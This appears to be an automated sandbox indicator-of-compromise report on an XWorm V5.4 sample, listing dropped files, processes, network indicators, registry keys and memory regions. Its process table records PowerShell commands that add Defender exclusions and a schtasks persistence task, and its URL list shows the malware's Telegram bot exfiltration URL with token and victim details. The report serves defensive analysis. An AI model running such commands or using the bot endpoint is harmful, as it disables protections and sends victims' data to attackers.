IOC Report
Or3dzp4vB1.exe

loading gif

Files

File Path
Type
Category
Malicious
Or3dzp4vB1.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\0720XW
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xe0b710cf, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0720XW.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
Generic INItialization configuration [WIN]
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05yyfy53.db4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aentktq4.4vc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afdtdl0z.i0h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxpmkh11.2yd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ef2tlzqn.fmk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0yqruff.2dr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_feth5wr1.fpm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fj3kxqne.uo4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1f23rlk.bpb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbk4ndre.nm4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5wyrqfc.3bd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1mvdb51.ypg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqygyiw.0fq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxzsiqxr.i4k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzu1l1j4.but.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xa0vhzl1.nck.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 12:12:39 2024, mtime=Wed Sep 25 12:12:39 2024, atime=Wed Sep 25 12:12:39 2024, length=81920, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 16 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Or3dzp4vB1.exe
"C:\Users\user\Desktop\Or3dzp4vB1.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"
malicious
C:\Users\user\AppData\Roaming\0720XW
C:\Users\user\AppData\Roaming\0720XW
malicious
C:\Users\user\AppData\Roaming\0720XW
C:\Users\user\AppData\Roaming\0720XW
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=6857243638&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A14ADFDFE8FE6B38195AF%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209YUNKW3%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%200720
149.154.167.220
malicious
https://api.telegram.org
unknown
malicious
https://api.telegram.org/bot
unknown
malicious
185.196.10.235
malicious
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=68572
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
http://www.microsoft.
unknown
https://github.com/Pester/Pester
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
http://crl.m(l
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co3
unknown
http://crl.micM;
unknown
https://.VisualC
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.mic?8
unknown
http://crl.micros
unknown
There are 19 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.telegram.org
149.154.167.220
malicious

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
185.196.10.235
unknown
Switzerland
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0720XW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Or3dzp4vB1_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Mozilla Firefox\firefox.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Mozilla Firefox\firefox.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Internet Explorer\iexplore.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Internet Explorer\iexplore.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\mspaint.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\mspaint.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\NOTEPAD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\NOTEPAD.EXE.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\root\Office16\Winword.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Microsoft Office\root\Office16\Winword.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Windows Media Player\wmplayer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Windows Media Player\wmplayer.exe.ApplicationCompany
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Windows NT\Accessories\WORDPAD.EXE.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 24 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A82000
unkown
page readonly
malicious
7FFAACBB3000
trusted library allocation
page execute and read and write
BF1000
heap
page read and write
18C48A18000
heap
page read and write
19F16FF000
stack
page read and write
20728BA0000
heap
page read and write
1661EFC2000
trusted library allocation
page read and write
18C48AE9000
heap
page read and write
18C46B57000
heap
page read and write
17A81868000
trusted library allocation
page read and write
1661EF30000
trusted library allocation
page read and write
1661C378000
heap
page read and write
1E8AD441000
trusted library allocation
page read and write
17A80F6E000
trusted library allocation
page read and write
690000
unkown
page readonly
18C48A0B000
heap
page read and write
20723FD5000
heap
page read and write
18C48A0B000
heap
page read and write
18C48A30000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
7FFAACE40000
trusted library allocation
page read and write
1E89E4E0000
trusted library allocation
page read and write
18C48A24000
heap
page read and write
18C48A20000
heap
page read and write
12871000
trusted library allocation
page read and write
17A81950000
trusted library allocation
page read and write
7FFAACDA0000
trusted library allocation
page read and write
18C46B1D000
heap
page read and write
1E89B683000
heap
page read and write
2A81000
trusted library allocation
page read and write
7FFAACDF0000
trusted library allocation
page read and write
224B5547000
heap
page execute and read and write
C85000
heap
page read and write
2249B6D0000
trusted library allocation
page read and write
207245B3000
heap
page read and write
1E8B5893000
heap
page read and write
1E89ED72000
trusted library allocation
page read and write
18C48A01000
heap
page read and write
20724562000
heap
page read and write
18C48A12000
heap
page read and write
20722600000
heap
page read and write
7FFAACC76000
trusted library allocation
page execute and read and write
BE7000
heap
page read and write
7FFB22760000
unkown
page readonly
17AF7145000
heap
page read and write
7FFAACD80000
trusted library allocation
page read and write
1C43D390000
trusted library allocation
page read and write
1E89E6C9000
trusted library allocation
page read and write
7FFAACE50000
trusted library allocation
page read and write
17A811DD000
trusted library allocation
page read and write
25ED8FE000
stack
page read and write
12878000
trusted library allocation
page read and write
20724596000
heap
page read and write
18C48A20000
heap
page read and write
17A81E26000
trusted library allocation
page read and write
1C4390F6000
heap
page read and write
18C48AD3000
heap
page read and write
7FFAACEEC000
trusted library allocation
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
17AF717E000
heap
page read and write
20724668000
heap
page read and write
7FFAACB84000
trusted library allocation
page read and write
18C48A0E000
heap
page read and write
E7AB8FA000
stack
page read and write
7FFAACE50000
trusted library allocation
page read and write
1661C384000
heap
page read and write
7FFAACBC2000
trusted library allocation
page read and write
166365C9000
heap
page read and write
207245C6000
heap
page read and write
2072466D000
heap
page read and write
18C46B0C000
heap
page read and write
18C48A01000
heap
page read and write
18C48A20000
heap
page read and write
332384C000
stack
page read and write
7FFAACBDC000
trusted library allocation
page execute and read and write
BDC000
heap
page read and write
2249E990000
trusted library allocation
page read and write
20724691000
heap
page read and write
18C48A1C000
heap
page read and write
1C473000
stack
page read and write
20724560000
heap
page read and write
18C46AFB000
heap
page read and write
1E8B5D20000
heap
page read and write
7FFAACB80000
trusted library allocation
page read and write
18C489E4000
heap
page read and write
2072472F000
heap
page read and write
207245A6000
heap
page read and write
E7AC88F000
stack
page read and write
207245A6000
heap
page read and write
18C48A0B000
heap
page read and write
18C48A1C000
heap
page read and write
224B504B000
heap
page read and write
17A81078000
trusted library allocation
page read and write
18C4B218000
heap
page read and write
18C489EA000
heap
page read and write
1E89D184000
heap
page read and write
20724592000
heap
page read and write
2249EE1D000
trusted library allocation
page read and write
18C489FC000
heap
page read and write
B61000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
224B59E0000
heap
page read and write
17A81DDC000
trusted library allocation
page read and write
207245BE000
heap
page read and write
207245BB000
heap
page read and write
18C48A05000
heap
page read and write
1661C438000
heap
page read and write
7FFAACFB0000
trusted library allocation
page read and write
7FFAACBD0000
trusted library allocation
page read and write
207225A8000
heap
page read and write
7FFAACEB0000
trusted library allocation
page read and write
224B579E000
heap
page read and write
7FFAACC70000
trusted library allocation
page read and write
224B5582000
heap
page read and write
1D918FE000
stack
page read and write
7FFAAD020000
trusted library allocation
page read and write
1843ECA0000
heap
page read and write
2249E01E000
trusted library allocation
page read and write
7FFB2277D000
unkown
page readonly
18C48A24000
heap
page read and write
2249D50D000
trusted library allocation
page read and write
7FFAACD31000
trusted library allocation
page read and write
18C48340000
heap
page read and write
1CF6A000
stack
page read and write
1E8B57ED000
heap
page read and write
207245A6000
heap
page read and write
20724586000
heap
page read and write
1C43D370000
trusted library allocation
page read and write
7FFAAD010000
trusted library allocation
page read and write
2249E377000
trusted library allocation
page read and write
1E89E01B000
trusted library allocation
page read and write
207245B1000
heap
page read and write
7FFAACB93000
trusted library allocation
page execute and read and write
2072472F000
heap
page read and write
20722587000
heap
page read and write
BF5000
heap
page read and write
1CB70000
heap
page read and write
2249E8A9000
trusted library allocation
page read and write
18C48A28000
heap
page read and write
1D914FE000
unkown
page readonly
2249D0C8000
trusted library allocation
page read and write
207225AF000
heap
page read and write
3E2D137000
stack
page read and write
2072459B000
heap
page read and write
7FFAACC36000
trusted library allocation
page read and write
1661F238000
trusted library allocation
page read and write
20723FDC000
heap
page read and write
1C43D289000
trusted library allocation
page read and write
16636716000
heap
page read and write
207246FC000
heap
page read and write
1C4390EE000
heap
page read and write
17A81038000
trusted library allocation
page read and write
7FFAACC36000
trusted library allocation
page read and write
18C48A30000
heap
page read and write
17A804CD000
trusted library allocation
page read and write
1D9127B000
stack
page read and write
1E8AD451000
trusted library allocation
page read and write
1C438C50000
trusted library section
page readonly
2072469B000
heap
page read and write
17AF70D0000
heap
page read and write
7FFAACEF0000
trusted library allocation
page read and write
207245BB000
heap
page read and write
2249DFE3000
trusted library allocation
page read and write
18C48A01000
heap
page read and write
207246FC000
heap
page read and write
2072465A000
heap
page read and write
2072259D000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
18C48A12000
heap
page read and write
20722592000
heap
page read and write
20724586000
heap
page read and write
17AF6E50000
trusted library allocation
page read and write
7FFAACE10000
trusted library allocation
page read and write
1661C3CD000
heap
page read and write
EE0000
trusted library allocation
page read and write
18C48BB9000
heap
page read and write
1C437C9C000
heap
page read and write
7FFAACCA5000
trusted library allocation
page execute and read and write
7DF43C4B0000
trusted library allocation
page execute and read and write
7FFAACEE8000
trusted library allocation
page read and write
1D927FE000
unkown
page readonly
224B5577000
heap
page read and write
7FFAACD40000
trusted library allocation
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
224B5950000
trusted library allocation
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
1662E27B000
trusted library allocation
page read and write
1843EF90000
heap
page read and write
18C48AC6000
heap
page read and write
18C48A05000
heap
page read and write
3E2D47E000
stack
page read and write
1D929FD000
stack
page read and write
207245A6000
heap
page read and write
7FFAACB94000
trusted library allocation
page read and write
1D91CFC000
stack
page read and write
1843EDB0000
heap
page read and write
18C48A01000
heap
page read and write
2249E215000
trusted library allocation
page read and write
2072472F000
heap
page read and write
18C489FC000
heap
page read and write
7FFAACC7C000
trusted library allocation
page execute and read and write
E7ABB3F000
stack
page read and write
7FFAACF7C000
trusted library allocation
page read and write
20724674000
heap
page read and write
C75000
heap
page read and write
17AF7877000
heap
page read and write
B8B000
heap
page read and write
18C46B0C000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
1E8B59A7000
heap
page read and write
1D91AF9000
stack
page read and write
1E8B57B3000
heap
page read and write
17AF70C0000
trusted library allocation
page read and write
7FFAACEB3000
trusted library allocation
page read and write
18C48A1C000
heap
page read and write
1C437C13000
heap
page read and write
4148CF7000
stack
page read and write
18C48A18000
heap
page read and write
7DF4588B0000
trusted library allocation
page execute and read and write
1E89D3F0000
trusted library allocation
page read and write
207246DB000
heap
page read and write
1C438B30000
trusted library allocation
page read and write
7FFAACF7C000
trusted library allocation
page read and write
207245B6000
heap
page read and write
2249E3C1000
trusted library allocation
page read and write
18C48B1E000
heap
page read and write
7FFAACF2C000
trusted library allocation
page read and write
17A80D86000
trusted library allocation
page read and write
20728BA8000
heap
page read and write
17AF6EA0000
trusted library allocation
page read and write
2249EE62000
trusted library allocation
page read and write
7FFAACDA0000
trusted library allocation
page read and write
E7ACA0C000
stack
page read and write
1C43D3D0000
remote allocation
page read and write
207245A1000
heap
page read and write
18C48A0B000
heap
page read and write
1AFFD000
stack
page read and write
18C48A18000
heap
page read and write
18C48A2C000
heap
page read and write
1661C2C0000
heap
page read and write
18C489D0000
heap
page read and write
207225A2000
heap
page read and write
207246F8000
heap
page read and write
207245B6000
heap
page read and write
1843EF95000
heap
page read and write
4149DCE000
stack
page read and write
17AF5485000
heap
page read and write
207245B6000
heap
page read and write
224B5785000
heap
page read and write
2072459B000
heap
page read and write
18C48A2C000
heap
page read and write
18C48A0E000
heap
page read and write
18C46B45000
heap
page read and write
207245A1000
heap
page read and write
7FFAACD20000
trusted library allocation
page read and write
20724672000
heap
page read and write
207245A6000
heap
page read and write
18C489D0000
heap
page read and write
20724589000
heap
page read and write
7FFAACFE0000
trusted library allocation
page read and write
20724596000
heap
page read and write
2072459B000
heap
page read and write
2CC1000
trusted library allocation
page read and write
18C489E4000
heap
page read and write
1C43905E000
heap
page read and write
1661E9E3000
trusted library allocation
page read and write
2D49000
trusted library allocation
page read and write
18C48A2C000
heap
page read and write
3322AFE000
stack
page read and write
20724716000
heap
page read and write
20724596000
heap
page read and write
18C48A1C000
heap
page read and write
20724583000
heap
page read and write
224AD0B4000
trusted library allocation
page read and write
207225AF000
heap
page read and write
17AF54F9000
heap
page read and write
1C438A40000
trusted library allocation
page read and write
207245A6000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
18C48330000
heap
page read and write
18C489F9000
heap
page read and write
7FFAACFC0000
trusted library allocation
page read and write
20724596000
heap
page read and write
18C489EB000
heap
page read and write
17AF5544000
heap
page read and write
18C48ADB000
heap
page read and write
207245B3000
heap
page read and write
7FFAACEF0000
trusted library allocation
page read and write
C2A000
heap
page read and write
7FFAACBBD000
trusted library allocation
page execute and read and write
2072459B000
heap
page read and write
18C48B97000
heap
page read and write
20724664000
heap
page read and write
7FFAACB83000
trusted library allocation
page execute and read and write
1C439200000
trusted library allocation
page read and write
C70000
heap
page read and write
1BA9E000
stack
page read and write
7E1000
stack
page read and write
18C48A30000
heap
page read and write
18C48A0B000
heap
page read and write
18C48A09000
heap
page read and write
4149C4A000
stack
page read and write
7FFAAD000000
trusted library allocation
page read and write
20723FDD000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
18C48A2C000
heap
page read and write
1663668C000
heap
page read and write
F45000
heap
page read and write
18C48510000
heap
page read and write
2A6E000
stack
page read and write
7FFAACF80000
trusted library allocation
page read and write
20724560000
heap
page read and write
7FFAACED9000
trusted library allocation
page read and write
18C48B1E000
heap
page read and write
207245B3000
heap
page read and write
1661C540000
trusted library allocation
page read and write
18C48B78000
heap
page read and write
18C48A2C000
heap
page read and write
7FFAACD64000
trusted library allocation
page read and write
207245A1000
heap
page read and write
18C48A30000
heap
page read and write
18C489D1000
heap
page read and write
1C438FF0000
trusted library allocation
page read and write
104E000
stack
page read and write
1C31E000
stack
page read and write
1D9257E000
stack
page read and write
F60000
heap
page read and write
207245B1000
heap
page read and write
1E8AD714000
trusted library allocation
page read and write
18C489F0000
heap
page read and write
1D9137E000
stack
page read and write
7FFAACBC0000
trusted library allocation
page read and write
18C489FC000
heap
page read and write
E7ABD3F000
stack
page read and write
7FFAACDD0000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
1B1C0000
heap
page execute and read and write
12D3000
trusted library allocation
page read and write
1E89E398000
trusted library allocation
page read and write
7FFAACEA0000
trusted library allocation
page read and write
7FFAACBE0000
trusted library allocation
page read and write
18C4B237000
heap
page read and write
1C43D260000
trusted library allocation
page read and write
207245B1000
heap
page read and write
1662DF91000
trusted library allocation
page read and write
1662DFB1000
trusted library allocation
page read and write
7FFAACC60000
trusted library allocation
page read and write
2072459E000
heap
page read and write
1B69E000
stack
page read and write
18C46B3A000
heap
page read and write
12C0000
trusted library allocation
page read and write
7FFAACEB3000
trusted library allocation
page read and write
1E89B6A2000
heap
page read and write
2072259B000
heap
page read and write
207225A7000
heap
page read and write
1C438502000
heap
page read and write
18C4B222000
heap
page read and write
7FFAACEE8000
trusted library allocation
page read and write
2D27000
trusted library allocation
page read and write
7FFAACE10000
trusted library allocation
page read and write
20724592000
heap
page read and write
18C48ADB000
heap
page read and write
207245AC000
heap
page read and write
207245B6000
heap
page read and write
20724731000
heap
page read and write
2072467B000
heap
page read and write
207225C6000
heap
page read and write
B4C000
heap
page read and write
2960000
heap
page execute and read and write
2072466D000
heap
page read and write
2072467B000
heap
page read and write
1661C36A000
heap
page read and write
19F14FA000
stack
page read and write
18C48B97000
heap
page read and write
207245BA000
heap
page read and write
18C489FC000
heap
page read and write
C80000
heap
page read and write
207225B2000
heap
page read and write
C8B000
heap
page read and write
17AF5430000
heap
page read and write
18C48A1C000
heap
page read and write
1CCA7000
heap
page read and write
207245A6000
heap
page read and write
7FFAACDE0000
trusted library allocation
page read and write
2249CEC0000
trusted library allocation
page read and write
2249E37C000
trusted library allocation
page read and write
18C46B5E000
heap
page read and write
18C48A24000
heap
page read and write
18C48A05000
heap
page read and write
1C438400000
heap
page read and write
18C48A1C000
heap
page read and write
7FFAACE10000
trusted library allocation
page read and write
224B5650000
heap
page read and write
2249CF40000
trusted library allocation
page read and write
18C48A20000
heap
page read and write
207245C2000
heap
page read and write
7FFAACD22000
trusted library allocation
page read and write
207225E8000
heap
page read and write
1C437CB1000
heap
page read and write
207245BF000
heap
page read and write
20724575000
heap
page read and write
2072459B000
heap
page read and write
B4A000
heap
page read and write
1C437CA1000
heap
page read and write
224B58EB000
heap
page read and write
224B5580000
heap
page read and write
7FFAACFD0000
trusted library allocation
page read and write
207245BA000
heap
page read and write
207245B2000
heap
page read and write
7FFAACF19000
trusted library allocation
page read and write
207245C8000
heap
page read and write
18C48A2C000
heap
page read and write
18C46AF3000
heap
page read and write
207245AC000
heap
page read and write
7FFAACD3A000
trusted library allocation
page read and write
224AD061000
trusted library allocation
page read and write
1661C370000
heap
page read and write
166366F8000
heap
page read and write
18C48A28000
heap
page read and write
18C48A18000
heap
page read and write
2249B660000
heap
page read and write
17AF77DB000
heap
page read and write
18C48A30000
heap
page read and write
7FFAACF70000
trusted library allocation
page read and write
17AF551C000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
7FFAACBCD000
trusted library allocation
page execute and read and write
2249E15D000
trusted library allocation
page read and write
2072457B000
heap
page read and write
18C48A13000
heap
page read and write
18C48AF5000
heap
page read and write
18C489EF000
heap
page read and write
207245A6000
heap
page read and write
7FFAACB90000
trusted library allocation
page read and write
20724587000
heap
page read and write
18C48A36000
heap
page read and write
18C46B06000
heap
page read and write
207246C8000
heap
page read and write
17AF54FC000
heap
page read and write
18C46AD5000
heap
page read and write
1661EF96000
trusted library allocation
page read and write
20724682000
heap
page read and write
17A90001000
trusted library allocation
page read and write
2072458B000
heap
page read and write
1661DF91000
trusted library allocation
page read and write
20723FD0000
heap
page read and write
7FFAACC46000
trusted library allocation
page read and write
1843EEB0000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
18C48A30000
heap
page read and write
1C437CC5000
heap
page read and write
207225B8000
heap
page read and write
1B24C000
stack
page read and write
7FFAAD030000
trusted library allocation
page read and write
7DF462D00000
trusted library allocation
page execute and read and write
18C46A60000
heap
page read and write
7FFAACB80000
trusted library allocation
page read and write
18C48AF3000
heap
page read and write
16636560000
heap
page execute and read and write
20724596000
heap
page read and write
207245B1000
heap
page read and write
1E89D649000
trusted library allocation
page read and write
207245AC000
heap
page read and write
E7ACB0C000
stack
page read and write
18C46A70000
heap
page read and write
18C489D7000
heap
page read and write
7FFAACF7A000
trusted library allocation
page read and write
7FFAACEE5000
trusted library allocation
page read and write
17A80C11000
trusted library allocation
page read and write
18C4B22D000
heap
page read and write
1661C43D000
heap
page read and write
7FFAACE70000
trusted library allocation
page read and write
1D913FE000
unkown
page readonly
17A80A52000
trusted library allocation
page read and write
48A28B9000
stack
page read and write
BD1000
stack
page read and write
7FFAACEB0000
trusted library allocation
page read and write
4148B7E000
stack
page read and write
207245B6000
heap
page read and write
7FFAACEEC000
trusted library allocation
page read and write
7FFAAD040000
trusted library allocation
page read and write
1C438402000
heap
page read and write
207245C2000
heap
page read and write
1E89E394000
trusted library allocation
page read and write
207245BB000
heap
page read and write
1662E299000
trusted library allocation
page read and write
18C4B226000
heap
page read and write
18C48A2C000
heap
page read and write
18C46B2D000
heap
page read and write
1661E1B9000
trusted library allocation
page read and write
41490FF000
stack
page read and write
18C48A24000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
7DF43C4C0000
trusted library allocation
page execute and read and write
1E89D2B0000
heap
page read and write
18C48B2C000
heap
page read and write
7FFAACB9B000
trusted library allocation
page read and write
20724583000
heap
page read and write
18C48A13000
heap
